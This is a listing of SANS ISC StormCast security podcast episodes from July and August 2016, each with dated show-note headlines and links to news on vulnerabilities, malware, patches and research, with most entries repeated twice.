Multiple Vulnerabilities in BHU Router http://blog.ioactive.com/2016/08/multiple-vulnerabilities-in-bhu-wifi.html Smart Socket Vulnerability https://labs.bitdefender.com/2016/08/hackers-can-use-smart-sockets-to-shut-down-critical-systems/ Smart Security Cameras are Spying on You http://www.forbes.com/sites/marcwebertobias/2016/08/22/is-your-smart-security-camera-protecting-your-home-or-spying-on-you/#6fb3a6414d1e Veracrypt 1.18a With Limited UEFI Support https://veracrypt.codeplex.com/releases/view/625477
8/23/20165 minutes
Episode Artwork

ISC StormCast for Monday, August 22nd 2016

GnuPG/libgcrypt Weak Random Numbers (CVE-2016-6316) https://lists.gnupg.org/pipermail/gnupg-announce/2016q3/000395.html Wikileaks Leaked E-Mail Includes Malware https://github.com/bontchev/wlscrape/blob/master/malware.md Android Vulnerable to TCP Connection Hijack https://blog.lookout.com/blog/2016/08/15/linux-vulnerability-android/ Cerber Ransomware Decryption Tool No Longer Operational https://www.cerberdecrypt.com/RansomwareDecryptionTool/
8/22/20165 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, August 22nd 2016

GnuPG/libgcrypt Weak Random Numbers (CVE-2016-6316) https://lists.gnupg.org/pipermail/gnupg-announce/2016q3/000395.html Wikileaks Leaked E-Mail Includes Malware https://github.com/bontchev/wlscrape/blob/master/malware.md Android Vulnerable to TCP Connection Hijack https://blog.lookout.com/blog/2016/08/15/linux-vulnerability-android/ Cerber Ransomware Decryption Tool No Longer Operational https://www.cerberdecrypt.com/RansomwareDecryptionTool/
8/22/20165 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, August 19th 2016

One Compromised Site - 2 Exploit Campaigns https://isc.sans.edu/forums/diary/1+compromised+site+2+campaigns/21381/ Shadow Broker Leak Vendor Responses https://blogs.cisco.com/security/shadow-brokers http://fortiguard.com/advisory/FG-IR-16-023 Google Releases OS X Whitelisting Application https://github.com/google/santa/wiki
8/18/20166 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, August 19th 2016

One Compromised Site - 2 Exploit Campaigns https://isc.sans.edu/forums/diary/1+compromised+site+2+campaigns/21381/ Shadow Broker Leak Vendor Responses https://blogs.cisco.com/security/shadow-brokers http://fortiguard.com/advisory/FG-IR-16-023 Google Releases OS X Whitelisting Application https://github.com/google/santa/wiki
8/18/20166 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, August 18th 2016

522 Error Code For the Win https://isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/ Short PGP Keys Abused in the Wild https://news.ycombinator.com/item?id=12296974 HTTP "FalseConnect" Vulnerability http://www.kb.cert.org/vuls/id/905344
8/17/20166 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, August 18th 2016

522 Error Code For the Win https://isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/ Short PGP Keys Abused in the Wild https://news.ycombinator.com/item?id=12296974 HTTP "FalseConnect" Vulnerability http://www.kb.cert.org/vuls/id/905344
8/17/20166 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, August 17th 2016

Cryptoanalysis of a Fully Homomorphic Encryption Scheme http://eprint.iacr.org/2016/775.pdf Recreating Android App Displays from Memory https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_saltaformaggio.pdf Various Router Exploits Released https://medium.com/@msuiche/shadow-brokers-nsa-exploits-of-the-week-3f7e17bdc216#.mnoyydmeu
8/16/20166 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, August 17th 2016

Cryptoanalysis of a Fully Homomorphic Encryption Scheme http://eprint.iacr.org/2016/775.pdf Recreating Android App Displays from Memory https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_saltaformaggio.pdf Various Router Exploits Released https://medium.com/@msuiche/shadow-brokers-nsa-exploits-of-the-week-3f7e17bdc216#.mnoyydmeu
8/16/20166 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, August 16th 2016

Starting October 2016, Microsoft Will Use Montly Rollup Updates for Win 7/8.1 https://blogs.technet.microsoft.com/windowsitpro/2016/08/15/further-simplifying-servicing-model-for-windows-7-and-windows-8-1/ Updated Group Policies To Block Macros in Office 2013 https://isc.sans.edu/forums/diary/MS+Office+2013+New+Macro+Controls+Sorta/21371/ Bypassing Application Whitelisting using WinDbg http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html Bypassing UAC without writing to disk https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
8/15/20166 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, August 16th 2016

Starting October 2016, Microsoft Will Use Montly Rollup Updates for Win 7/8.1 https://blogs.technet.microsoft.com/windowsitpro/2016/08/15/further-simplifying-servicing-model-for-windows-7-and-windows-8-1/ Updated Group Policies To Block Macros in Office 2013 https://isc.sans.edu/forums/diary/MS+Office+2013+New+Macro+Controls+Sorta/21371/ Bypassing Application Whitelisting using WinDbg http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html Bypassing UAC without writing to disk https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
8/15/20166 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, August 15th 2016

Most Android Devices Protected From Quadrooter By Default http://www.androidcentral.com/google-confirms-verify-apps-can-block-apps-quadrooter-exploits Dangers of IP Geolocation https://nakedsecurity.sophos.com/2016/08/11/couple-sue-over-ip-glitch-that-repeatedly-sent-feds-to-their-house/ Microsoft Secure Boot Key Bypass https://rol.im/securegoldenkeyboot/ (careful. highly annoying but harmless)
8/14/20166 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, August 15th 2016

Most Android Devices Protected From Quadrooter By Default http://www.androidcentral.com/google-confirms-verify-apps-can-block-apps-quadrooter-exploits Dangers of IP Geolocation https://nakedsecurity.sophos.com/2016/08/11/couple-sue-over-ip-glitch-that-repeatedly-sent-feds-to-their-house/ Microsoft Secure Boot Key Bypass https://rol.im/securegoldenkeyboot/ (careful. highly annoying but harmless)
8/14/20166 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, August 12th 2016

Bling Spoofing of TCP Connections CVE-2016-5696 http://www.cs.ucr.edu/~zhiyunq/pub/sec16_TCP_pure_offpath.pdf Fingerprinting TLS Using TShark https://isc.sans.edu/forums/diary/Profiling+SSL+Clients+with+tshark/21361/ Forensics Artifcats on iOS Messaging Apps https://isc.sans.edu/forums/diary/Looking+for+the+insider+Forensic+Artifacts+on+iOS+Messaging+App/21363/ Vulnerable VW Remote Keyless Unlock https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/garcia
8/11/20169 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, August 12th 2016

Bling Spoofing of TCP Connections CVE-2016-5696 http://www.cs.ucr.edu/~zhiyunq/pub/sec16_TCP_pure_offpath.pdf Fingerprinting TLS Using TShark https://isc.sans.edu/forums/diary/Profiling+SSL+Clients+with+tshark/21361/ Forensics Artifcats on iOS Messaging Apps https://isc.sans.edu/forums/diary/Looking+for+the+insider+Forensic+Artifacts+on+iOS+Messaging+App/21363/ Vulnerable VW Remote Keyless Unlock https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/garcia
8/11/20169 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, August 10th 2016

MSFT Patch Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+August+2016/21357/ Adobe Patch for Adobe Experience Manager https://helpx.adobe.com/security/products/experience-manager/apsb16-27.html Avast Anti Virus Conflict With Windows 10 Anniversary Update https://forum.avast.com/index.php?topic=189403.0
8/10/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, August 10th 2016

MSFT Patch Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+August+2016/21357/ Adobe Patch for Adobe Experience Manager https://helpx.adobe.com/security/products/experience-manager/apsb16-27.html Avast Anti Virus Conflict With Windows 10 Anniversary Update https://forum.avast.com/index.php?topic=189403.0
8/10/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, August 9th 2016

Using File Entropy to Identify "Ransomwared" Files https://isc.sans.edu/forums/diary/Using+File+Entropy+to+Identify+Ransomwared+Files/21351/ Bypassing Windows Digital Signatures https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Executable-wp.pdf Quadrooter Android Vulnerability http://blog.checkpoint.com/2016/08/07/quadrooter/ Defcon Slides Online https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/ Philips Hue Exploit (Video) http://colinoflynn.com/wp-content/uploads/2016/08/us-16-OFlynn-A-Lightbulb-Worm-wp.pdf
8/8/20166 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, August 9th 2016

Using File Entropy to Identify "Ransomwared" Files https://isc.sans.edu/forums/diary/Using+File+Entropy+to+Identify+Ransomwared+Files/21351/ Bypassing Windows Digital Signatures https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Executable-wp.pdf Quadrooter Android Vulnerability http://blog.checkpoint.com/2016/08/07/quadrooter/ Defcon Slides Online https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/ Philips Hue Exploit (Video) http://colinoflynn.com/wp-content/uploads/2016/08/us-16-OFlynn-A-Lightbulb-Worm-wp.pdf
8/8/20166 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, August 8th 2016

Analyzing Malicious RTF Files https://isc.sans.edu/forums/diary/rtfdump/21347/ Monitors Vulnerable To Remote Code Execution http://motherboard.vice.com/read/hackers-could-break-into-your-monitor-to-spy-on-you-and-manipulate-your-pixels Brute Forcing Encrypted Hard drive Protections https://www.blackhat.com/docs/us-16/materials/us-16-OFlynn-Brute-Forcing-Lockdown-Harddrive-PIN-Codes.pdf What is Using Your Webcam http://www.welivesecurity.com/2016/08/04/afraid-someone-misusing-webcam/
8/8/20165 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, August 8th 2016

Analyzing Malicious RTF Files https://isc.sans.edu/forums/diary/rtfdump/21347/ Monitors Vulnerable To Remote Code Execution http://motherboard.vice.com/read/hackers-could-break-into-your-monitor-to-spy-on-you-and-manipulate-your-pixels Brute Forcing Encrypted Hard drive Protections https://www.blackhat.com/docs/us-16/materials/us-16-OFlynn-Brute-Forcing-Lockdown-Harddrive-PIN-Codes.pdf What is Using Your Webcam http://www.welivesecurity.com/2016/08/04/afraid-someone-misusing-webcam/
8/8/20165 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, August 5th 2016

Surge in Scans for Netis Router https://isc.sans.edu/forums/diary/Surge+in+Exploit+Attempts+for+Netis+Router+Backdoor+UDP53413/21337/ iPhone Thieves Use Targeted Phishing https://hackernoon.com/this-is-what-apple-should-tell-you-when-you-lose-your-iphone-8f07cf73cf82#.spgmbaejk NUUO/ReadyNAS Video Recorder Vulnerabilities https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt mixed-blend-mode Browser History Leak https://lcamtuf.blogspot.com/2016/08/css-mix-blend-mode-is-bad-for-keeping.html
8/5/20166 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, August 5th 2016

Surge in Scans for Netis Router https://isc.sans.edu/forums/diary/Surge+in+Exploit+Attempts+for+Netis+Router+Backdoor+UDP53413/21337/ iPhone Thieves Use Targeted Phishing https://hackernoon.com/this-is-what-apple-should-tell-you-when-you-lose-your-iphone-8f07cf73cf82#.spgmbaejk NUUO/ReadyNAS Video Recorder Vulnerabilities https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt mixed-blend-mode Browser History Leak https://lcamtuf.blogspot.com/2016/08/css-mix-blend-mode-is-bad-for-keeping.html
8/5/20166 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, August 4th 2016

The Dark Side of Certificate Transparency https://isc.sans.edu/forums/diary/The+Dark+Side+of+Certificate+Transparency/21329/ Ouch Security Awareness Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016 HTTP/2 Vulnerabilities http://www.imperva.com/docs/Imperva_HII_HTTP2.pdf
8/4/20166 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, August 4th 2016

The Dark Side of Certificate Transparency https://isc.sans.edu/forums/diary/The+Dark+Side+of+Certificate+Transparency/21329/ Ouch Security Awareness Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016 HTTP/2 Vulnerabilities http://www.imperva.com/docs/Imperva_HII_HTTP2.pdf
8/4/20166 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, August 3rd 2016

Windows 10 Aniversary Update Feedback https://kc.mcafee.com/corporate/index?page=content&id=KB87536 Android Updates https://source.android.com/security/bulletin/2016-08-01.html Unlocking Murder Victim Phone With Printed Fingerprint http://msutoday.msu.edu/news/2016/accessing-a-murder-victims-smartphone-to-help-solve-a-crime/ signout.live.com remote code execution vulnerability http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html Edge/IE Still Leak NTLM Credentials (since 1997!) hxxp://witch.valdikss.org.ru (careful: test site will try to grab credentials)
8/3/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, August 3rd 2016

Windows 10 Aniversary Update Feedback https://kc.mcafee.com/corporate/index?page=content&id=KB87536 Android Updates https://source.android.com/security/bulletin/2016-08-01.html Unlocking Murder Victim Phone With Printed Fingerprint http://msutoday.msu.edu/news/2016/accessing-a-murder-victims-smartphone-to-help-solve-a-crime/ signout.live.com remote code execution vulnerability http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html Edge/IE Still Leak NTLM Credentials (since 1997!) hxxp://witch.valdikss.org.ru (careful: test site will try to grab credentials)
8/3/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, August 2nd 2016

Are You Getting I-CANNED? https://isc.sans.edu/forums/diary/Are+you+getting+ICANNED/21323/ Windows 10 Anniversary Edition https://blogs.windows.com/windowsexperience/2016/06/29/windows-10-anniversary-update-available-august-2/ Pangu Jailbreak Leading To Compromised Accounts? https://www.reddit.com/r/jailbreak/comments/4v9cju/discussion_is_pangus_jailbreak_safe_an_hour_after/ https://twitter.com/PanguTeam/status/759729314577342468 SANS Boston "Security Impact of IPv6" https://www.sans.org/event/boston-2016/bonus-sessions/9392/#bonus-box
8/2/20166 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, August 2nd 2016

Are You Getting I-CANNED? https://isc.sans.edu/forums/diary/Are+you+getting+ICANNED/21323/ Windows 10 Anniversary Edition https://blogs.windows.com/windowsexperience/2016/06/29/windows-10-anniversary-update-available-august-2/ Pangu Jailbreak Leading To Compromised Accounts? https://www.reddit.com/r/jailbreak/comments/4v9cju/discussion_is_pangus_jailbreak_safe_an_hour_after/ https://twitter.com/PanguTeam/status/759729314577342468 SANS Boston "Security Impact of IPv6" https://www.sans.org/event/boston-2016/bonus-sessions/9392/#bonus-box
8/2/20166 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, August 1st 2016

rtfobj Update https://isc.sans.edu/forums/diary/rtfobj/21317/ Comodo SSL Certificates Mixup https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-certificates-from-comodo-via-dangling-markup-injection/index.html SwiftKey Keyboard May Leak Private Data to Other Users https://blog.swiftkey.com/important-information-relating-to-the-status-of-our-sync-services/ New Version of OPNSense Released https://forum.opnsense.org/index.php?topic=3428.0 WhatsApp Does Not Delete All Chats http://www.zdziarski.com/blog/?p=6143
7/31/20165 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, August 1st 2016

rtfobj Update https://isc.sans.edu/forums/diary/rtfobj/21317/ Comodo SSL Certificates Mixup https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-certificates-from-comodo-via-dangling-markup-injection/index.html SwiftKey Keyboard May Leak Private Data to Other Users https://blog.swiftkey.com/important-information-relating-to-the-status-of-our-sync-services/ New Version of OPNSense Released https://forum.opnsense.org/index.php?topic=3428.0 WhatsApp Does Not Delete All Chats http://www.zdziarski.com/blog/?p=6143
7/31/20165 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, July 29th 2016

Verifying SSL/TLS Certificates Manually https://isc.sans.edu/forums/diary/Verifying+SSLTLS+certificates+manually/21311/ LastPass Security Updates https://blog.lastpass.com/2016/07/lastpass-security-updates.html/ Android Linux Kernel Defenses https://security.googleblog.com/2016/07/protecting-android-with-more-linux.html Update to ISC Suspicious Domain List https://isc.sans.edu/suspicious_domains.html
7/29/20165 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, July 29th 2016

Verifying SSL/TLS Certificates Manually https://isc.sans.edu/forums/diary/Verifying+SSLTLS+certificates+manually/21311/ LastPass Security Updates https://blog.lastpass.com/2016/07/lastpass-security-updates.html/ Android Linux Kernel Defenses https://security.googleblog.com/2016/07/protecting-android-with-more-linux.html Update to ISC Suspicious Domain List https://isc.sans.edu/suspicious_domains.html
7/29/20165 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, July 28th 2016

Linux Bot Analysis https://isc.sans.edu/forums/diary/Analyze+of+a+Linux+botnet+client+source+code/21305/ Critical XEN PV Guests Vulnerability https://isc.sans.edu/forums/diary/Critical+Xen+PV+guests+vulnerabilities/21307/ LastPass Vulnerability https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/ Chimera Ransomware Keys Leaked https://blog.malwarebytes.com/cybercrime/2016/07/keys-to-chimera-ransomware-leaked/ Fiat/Chrysler Software Recall http://www.thecarconnection.com/news/1105198_2015-chrysler-200-jeep-renegade-2014-2015-jeep-cherokee-recalled-410000-vehicles-affected?preview=true Defending Web Applications Security Essentials (DEV522) in Vegas! https://www.sans.org/event/network-security-2016/course/defending-web-applications-security-essentials
7/28/20165 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, July 28th 2016

Linux Bot Analysis https://isc.sans.edu/forums/diary/Analyze+of+a+Linux+botnet+client+source+code/21305/ Critical XEN PV Guests Vulnerability https://isc.sans.edu/forums/diary/Critical+Xen+PV+guests+vulnerabilities/21307/ LastPass Vulnerability https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/ Chimera Ransomware Keys Leaked https://blog.malwarebytes.com/cybercrime/2016/07/keys-to-chimera-ransomware-leaked/ Fiat/Chrysler Software Recall http://www.thecarconnection.com/news/1105198_2015-chrysler-200-jeep-renegade-2014-2015-jeep-cherokee-recalled-410000-vehicles-affected?preview=true Defending Web Applications Security Essentials (DEV522) in Vegas! https://www.sans.org/event/network-security-2016/course/defending-web-applications-security-essentials
7/28/20165 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, July 27th 2016

DNS Cmd and Ctrl via AAAA Records https://isc.sans.edu/forums/diary/Command+and+Control+Channels+Using+AAAA+DNS+Records/21301/ Microsoft Authenticator https://blogs.technet.microsoft.com/enterprisemobility/2016/07/25/microsoft-authenticator-coming-august-15th/ WPAD May Leak HTTPS URLs http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/ HOnions: Tor Servers To Discover Snooping Tor Nodes https://regmedia.co.uk/2016/07/25/10_honions-sanatinia.pdf
7/27/20166 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, July 27th 2016

DNS Cmd and Ctrl via AAAA Records https://isc.sans.edu/forums/diary/Command+and+Control+Channels+Using+AAAA+DNS+Records/21301/ Microsoft Authenticator https://blogs.technet.microsoft.com/enterprisemobility/2016/07/25/microsoft-authenticator-coming-august-15th/ WPAD May Leak HTTPS URLs http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/ HOnions: Tor Servers To Discover Snooping Tor Nodes https://regmedia.co.uk/2016/07/25/10_honions-sanatinia.pdf
7/27/20166 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, July 26th 2016

Python Malware - Part 4 https://isc.sans.edu/forums/diary/Python+Malware+Part+4/21297/ Powerware Decrypter https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py No More Ransomware https://www.nomoreransom.org Pangu iOS 9.3.3 Jailbrake http://en.pangu.io Safe Skies TSA Keys Duplicated http://www.3ders.org/articles/20160725-hackers-create-3d-printed-tsa-safe-skies-master-key-for-luggage-release-blueprints.html
7/26/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, July 26th 2016

Python Malware - Part 4 https://isc.sans.edu/forums/diary/Python+Malware+Part+4/21297/ Powerware Decrypter https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py No More Ransomware https://www.nomoreransom.org Pangu iOS 9.3.3 Jailbrake http://en.pangu.io Safe Skies TSA Keys Duplicated http://www.3ders.org/articles/20160725-hackers-create-3d-printed-tsa-safe-skies-master-key-for-luggage-release-blueprints.html
7/26/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, July 25th 2016

NIST Digital Authentication Guide Preview https://github.com/usnistgov/800-63-3 Powerware Ransomware Spoofing Locky http://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/ SAP HANA Security Advisory http://www.onapsis.com/research/security-advisories Pokemon Go Forensics https://www.gillware.com/forensics/blog/mobile-forensics/oh-no-pokemon-go-forensic-artifacts
7/25/20165 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, July 25th 2016

NIST Digital Authentication Guide Preview https://github.com/usnistgov/800-63-3 Powerware Ransomware Spoofing Locky http://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/ SAP HANA Security Advisory http://www.onapsis.com/research/security-advisories Pokemon Go Forensics https://www.gillware.com/forensics/blog/mobile-forensics/oh-no-pokemon-go-forensic-artifacts
7/25/20165 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, July 22nd 2016

A Practice ntds.dit File For Hash Extraction and Password Cracking https://isc.sans.edu/forums/diary/Practice+ntdsdit+File/21287/ Mozilla Further Reducing Flash Content https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/ Little Snitch Update https://www.obdev.at/products/littlesnitch/releasenotes.html PHP 7.0.9 / 5.6.24 Released (fixes httpoxy vulnerability) http://php.net/ChangeLog-7.php#7.0.9 http://www.php.net/ChangeLog-5.php#5.6.24 Google Chrome Update http://googlechromereleases.blogspot.com/search/label/Stable%20updates
7/22/20164 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, July 22nd 2016

A Practice ntds.dit File For Hash Extraction and Password Cracking https://isc.sans.edu/forums/diary/Practice+ntdsdit+File/21287/ Mozilla Further Reducing Flash Content https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/ Little Snitch Update https://www.obdev.at/products/littlesnitch/releasenotes.html PHP 7.0.9 / 5.6.24 Released (fixes httpoxy vulnerability) http://php.net/ChangeLog-7.php#7.0.9 http://www.php.net/ChangeLog-5.php#5.6.24 Google Chrome Update http://googlechromereleases.blogspot.com/search/label/Stable%20updates
7/22/20164 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, July 21st 2016

Oracle Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html DNS Root Key Rotation http://schd.ws/hosted_files/icann562016/60/Matt%20Larson%20ICANN56%20KSK%20roll%20briefing.pdf Anti-Malware Codehooking Vulnerabilities http://breakingmalware.com/vulnerabilities/captain-hook-pirating-avs-bypass-exploit-mitigations/ More Details Regaring Apple's Image I/O Vulnerablity http://www.talosintelligence.com/reports/TALOS-2016-0171/ Hidden Backdoor in Dell Security Software https://www.digitaldefense.com/ddi-six-discoveries/
7/21/20165 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, July 21st 2016

Oracle Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html DNS Root Key Rotation http://schd.ws/hosted_files/icann562016/60/Matt%20Larson%20ICANN56%20KSK%20roll%20briefing.pdf Anti-Malware Codehooking Vulnerabilities http://breakingmalware.com/vulnerabilities/captain-hook-pirating-avs-bypass-exploit-mitigations/ More Details Regaring Apple's Image I/O Vulnerablity http://www.talosintelligence.com/reports/TALOS-2016-0171/ Hidden Backdoor in Dell Security Software https://www.digitaldefense.com/ddi-six-discoveries/
7/21/20165 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, July 20th 2016

Objective Systems ASN1C Compiler Creates Vulnerable Code https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080 Office Maldoc Analysis https://isc.sans.edu/forums/diary/Office+Maldoc+Lets+Focus+on+the+VBA+Macros+Later/21275/ Defeating GMail's Malicious Macro Signatures https://warroom.securestate.com/bypassing-gmails-malicious-macro-signatures/
7/20/20165 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, July 20th 2016

Objective Systems ASN1C Compiler Creates Vulnerable Code https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080 Office Maldoc Analysis https://isc.sans.edu/forums/diary/Office+Maldoc+Lets+Focus+on+the+VBA+Macros+Later/21275/ Defeating GMail's Malicious Macro Signatures https://warroom.securestate.com/bypassing-gmails-malicious-macro-signatures/
7/20/20165 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, July 19th 2016

httpoxy Vulnerability https://isc.sans.edu/forums/diary/HTTP+Proxy+Header+Vulnerability+httpoxy/21271/ Apple Security Updates https://support.apple.com/en-us/HT201222 Toll Number Calling via Two Factor Authentication https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/
7/19/20166 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, July 19th 2016

httpoxy Vulnerability https://isc.sans.edu/forums/diary/HTTP+Proxy+Header+Vulnerability+httpoxy/21271/ Apple Security Updates https://support.apple.com/en-us/HT201222 Toll Number Calling via Two Factor Authentication https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/
7/19/20166 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, July 18th 2016

More Python Malware Critical Juniper Vulnerability https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10755&actp=search MS16-053 Included in Neutrino Exploit Kit https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html SSH Username Disclosure http://seclists.org/fulldisclosure/2016/Jul/51
7/18/20165 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, July 18th 2016

More Python Malware Critical Juniper Vulnerability https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10755&actp=search MS16-053 Included in Neutrino Exploit Kit https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html SSH Username Disclosure http://seclists.org/fulldisclosure/2016/Jul/51
7/18/20165 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, July 15th 2016

The Power of Web Shells https://isc.sans.edu/forums/diary/The+Power+of+Web+Shells/21257/ Airtel India Intercepting Cloudflare Traffic https://medium.com/@karthikb351/airtel-is-sniffing-and-censoring-cloudflares-traffic-in-india-and-they-don-t-even-know-it-90935f7f6d98#.g78ucnpo6 WordPress SEO Pack Plugin Persistent Cross Site Scripting https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html Github Releases synsanity SYN Flood Defense http://githubengineering.com/syn-flood-mitigation-with-synsanity/ MS16-094 Prevents Booting Linux On Microsoft Surface http://www.theregister.co.uk/2016/07/15/windows_fix_closes_rt_unlock_loophole/
7/15/20165 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, July 15th 2016

The Power of Web Shells https://isc.sans.edu/forums/diary/The+Power+of+Web+Shells/21257/ Airtel India Intercepting Cloudflare Traffic https://medium.com/@karthikb351/airtel-is-sniffing-and-censoring-cloudflares-traffic-in-india-and-they-don-t-even-know-it-90935f7f6d98#.g78ucnpo6 WordPress SEO Pack Plugin Persistent Cross Site Scripting https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html Github Releases synsanity SYN Flood Defense http://githubengineering.com/syn-flood-mitigation-with-synsanity/ MS16-094 Prevents Booting Linux On Microsoft Surface http://www.theregister.co.uk/2016/07/15/windows_fix_closes_rt_unlock_loophole/
7/15/20165 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, July 14th 2016

Hunting for Malicious Files with MISP + OSSEC https://isc.sans.edu/forums/diary/Hunting+for+Malicious+Files+with+MISP+OSSEC/21251/ Drupal: Patch released today to fix a highly critical RCE in contributed modules https://isc.sans.edu/forums/diary/Drupal+Patch+released+today+to+fix+a+highly+critical+RCE+in+contributed+modules/21255/ Riffle anonymity network trying to compete with tor http://people.csail.mit.edu/devadas/pubs/riffle.pdf
7/14/20164 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, July 14th 2016

Hunting for Malicious Files with MISP + OSSEC https://isc.sans.edu/forums/diary/Hunting+for+Malicious+Files+with+MISP+OSSEC/21251/ Drupal: Patch released today to fix a highly critical RCE in contributed modules https://isc.sans.edu/forums/diary/Drupal+Patch+released+today+to+fix+a+highly+critical+RCE+in+contributed+modules/21255/ Riffle anonymity network trying to compete with tor http://people.csail.mit.edu/devadas/pubs/riffle.pdf
7/14/20164 minutes, 38 seconds
Episode Artwork

ISC StormCast for Wednesday, July 13th 2016

